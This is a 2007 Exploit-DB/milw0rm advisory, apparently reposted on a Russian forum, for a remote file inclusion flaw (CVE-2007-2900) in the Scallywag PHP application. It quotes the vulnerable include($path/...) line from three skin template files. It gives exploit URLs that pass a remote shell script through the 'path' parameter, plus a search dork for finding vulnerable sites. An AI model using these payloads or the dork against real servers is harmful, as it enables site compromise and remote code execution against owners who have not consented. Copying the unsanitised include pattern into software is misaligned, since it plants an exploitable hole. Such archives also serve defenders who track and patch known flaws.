- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3972
- Проверка EDB
-
- Пройдено
- Автор
- MEHMET INCE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-2900
- Дата публикации
- 2007-05-23
Код:
##############################################################################################
#Scallywag <= Remote File Inclusion Vulnerability #
# #
#Dork:"Powered by Scallywag" #
# #
# #
##############################################################################################
#Vuln Code #
# #
#ERROR1:skin/dark/template.php #
# #
# <?php #
# include("$path/source/top.txt"); <<< RFI CODE #
# #
# #
#BUG1: #
# #
#Example1:http://victim.com/path/skin/dark/template.php?path=[[Sh3LL Script]] #
##############################################################################################
# #
#ERROR2:skin/gold/template.php #
# #
# <?php #
# include("$path/source/top.txt"); <<< RFI CODE #
# #
# #
#BUG2: #
# #
#Example1:http://victim.com/path/skin/gold/template.php?path=[[Sh3LL Script]] #
##############################################################################################
# #
#ERROR3:skin/original/template.php #
# #
# <?php #
# include("$path/source/top.txt"); <<< RFI CODE #
# #
# #
#BUG3: #
# #
#Example1: http://victim.com/path/skin/original/template.php?path=[[Sh3LL Script]] #
##############################################################################################
# #
#Script Download #
##############################################################################################
# #
#http://www.woweb.ru/load/82-1-0-3791 #
# #
##############################################################################################
# #
#Cyber-Security #
# #
##############################################################################################
##############################################################################################
# milw0rm.com [2007-05-23]
- Источник
- www.exploit-db.com